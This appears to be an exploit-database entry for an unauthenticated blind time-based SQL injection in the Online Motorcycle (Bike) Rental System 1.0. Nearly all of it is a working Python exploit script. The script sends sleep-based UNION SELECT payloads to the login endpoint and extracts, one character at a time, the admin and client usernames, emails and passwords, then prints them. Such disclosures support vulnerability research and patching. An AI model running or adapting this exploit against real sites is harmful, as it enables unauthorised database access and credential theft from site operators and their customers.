Online Motorcycle (Bike) Rental System 1.0 - Blind Time-Based SQL Injection (Unauthenticated)

2021-10-19
ID: 104869
CVE: None
Download vulnerable application: None
# Exploit Title: 
# Exploit Author: Chase Comardelle(CASO)
# Date: October 18, 2021
# Vendor Homepage: https://www.sourcecodester.com/php/14989/online-motorcycle-bike-rental-system-phpoop-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/bike_rental_0.zip
# Tested on: Kali Linux, Apache, Mysql
# Vendor: oretnom23
# Version: v1.0
# Exploit Description:
# Online Motorcycle (Bike) Rental System is vulnerable to a Blind Time-Based SQL Injection attack. This can lead attackers to remotely dump MySql database credentials


#EXAMPLE PAYLOAD - [email protected]' UNION SELECT IF((SELECT SUBSTRING((SELECT password from users where username='admin'),1,1)='1'),sleep(10),'a'),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL;
#EXAMPLE EXECUTION - python3 sqliExploit.py http://localhost/bike_rental/ 

import requests
import sys
import urllib3
import pyfiglet 




urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)


proxies = {'http': 'http://127.0.0.1:8080', 'https': 'https://127.0.0.1:8080'}



def find_clients_usernames(url):
    clients = ""
    cookies = {'Cookie:':'PHPSESSID='}
    headers = {'DNT': '1', 'SEC-GPC': '1', 'Referer' : 'http://localhost/bike_rental/','Origin': 'http://localhost','X-Requested-With' : 'XMLHttpRequest','Content-Type' : 'application/x-www-form-urlencoded; charset=UTF-8'}
    path = '/classes/Login.php?f=login_user'
    position = 1
    i=0
    while i <len(chars) :
        sqli = "[email protected]'UNION+SELECT+IF((SELECT+SUBSTRING((SELECT+GROUP_CONCAT(email+SEPARATOR+',')+from+clients),%s,1)='%s'),sleep(1),''),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--+-&password=test" %(position,chars[i])
        r = requests.post(url + path,data=sqli,headers=headers,cookies=cookies, verify=False)
    
        if r.elapsed.total_seconds() > 1:
            clients += chars[i]
            i=0
            position+=1
        else:
            i +=1    
    return clients


def find_db_usernames(url):
    users = ""
    cookies = {'Cookie:':'PHPSESSID='}
    headers = {'DNT': '1', 'SEC-GPC': '1', 'Referer' : 'http://localhost/bike_rental/','Origin': 'http://localhost','X-Requested-With' : 'XMLHttpRequest','Content-Type' : 'application/x-www-form-urlencoded; charset=UTF-8'}
    path = '/classes/Login.php?f=login_user'
    position = 1
    i=0
    while i <len(chars) :
        sqli = "[email protected]'UNION+SELECT+IF((SELECT+SUBSTRING((SELECT+GROUP_CONCAT(username+SEPARATOR+',')+from+users),%s,1)='%s'),sleep(1),''),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--+-&password=test" %(position,chars[i])
        r = requests.post(url + path,data=sqli,headers=headers,cookies=cookies, verify=False)
    
        if r.elapsed.total_seconds() > 1:
            users += chars[i]
            i=0
            position+=1
        else:
            i +=1    
    return users

def find_db_passwords(url):
    passwords = ""
    clientCount = 0
    cookies = {'Cookie:':'PHPSESSID='}
    headers = {'DNT': '1', 'SEC-GPC': '1', 'Referer' : 'http://localhost/bike_rental/','Origin': 'http://localhost','X-Requested-With' : 'XMLHttpRequest','Content-Type' : 'application/x-www-form-urlencoded; charset=UTF-8'}
    path = '/classes/Login.php?f=login_user'
    position = 1
    i=0

    while i <len(chars) :
        sqli = "[email protected]'UNION+SELECT+IF((SELECT+SUBSTRING((SELECT+GROUP_CONCAT(password+SEPARATOR+',')+from+users),%s,1)='%s'),sleep(1),''),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--+-&password=test" %(position,chars[i])
        r = requests.post(url + path,data=sqli,headers=headers,cookies=cookies, verify=False)

        if r.elapsed.total_seconds() > 1:
            passwords += chars[i]
            i=0
            position+=1
        else:
            i +=1   

    return passwords

def find_client_passwords(url):
    passwords = ""
    clientCount = 0
    cookies = {'Cookie:':'PHPSESSID='}
    headers = {'DNT': '1', 'SEC-GPC': '1', 'Referer' : 'http://localhost/bike_rental/','Origin': 'http://localhost','X-Requested-With' : 'XMLHttpRequest','Content-Type' : 'application/x-www-form-urlencoded; charset=UTF-8'}
    path = '/classes/Login.php?f=login_user'
    position = 1
    i=0

    while i <len(chars) :
        sqli = "[email protected]'UNION+SELECT+IF((SELECT+SUBSTRING((SELECT+GROUP_CONCAT(password+SEPARATOR+',')+from+clients),%s,1)='%s'),sleep(1),''),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--+-&password=test" %(position,chars[i])
        r = requests.post(url + path,data=sqli,headers=headers,cookies=cookies, verify=False)

        if r.elapsed.total_seconds() > 1:
            passwords += chars[i]
            i=0
            position+=1
        else:
            i +=1   
 
    return passwords


def create_table(users,passwords):
    
    
    for  i in range(0,len(users)):
       print(users[i]," | ",passwords[i])

def print_header():
    print("[*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*]")
    print("[*]     Online Motorcycle (Bike) Rental System     [*]")
    print("[*] Unauthenticated Blind Time-Based SQL Injection [*]")
    print("[*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*]")
    print("\n")
    print(pyfiglet.figlet_format("      CAS0", font = "slant"  ))  

chars = [ 'a','b','c','d','e','f','g','h','i','j','k','l','m','n','o',
          'p','q','r','s','t','u','v','w','x','y','z','A','B','C','D',
          'E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S',
          'T','U','V','W','X','Y','Z','0','1','2','3','4','5','6','7',
          '8','9','@','#',",",'.']



if __name__ == "__main__":
    try:
        url = sys.argv[1].strip()
    except IndexError:
        print("[-] Usage: %s <url>" % sys.argv[0])
        print("[-] Example: %s www.example.com" % sys.argv[0])
        sys.exit(-1)


print_header()
print("[*] RETRIEVING CREDENTIALS NOW [*]")
dbUsernames = find_db_usernames(url)
dbUsernames = dbUsernames.split(",")

dbPasswords = find_db_passwords(url)
dbPasswords = dbPasswords.split(",")

print("[*] DATABASE CREDENTIALS [*]")
create_table(dbUsernames,dbPasswords)

clientUsernames = find_clients_usernames(url)
clientsUsernames = clientUsernames.split(",")

clientPasswords = find_client_passwords(url)
clientPasswords = clientPasswords.split(",")

print("[*] CLIENT CREDENTIALS [*]")
create_table(clientsUsernames,clientPasswords)
1-4-2 (www01)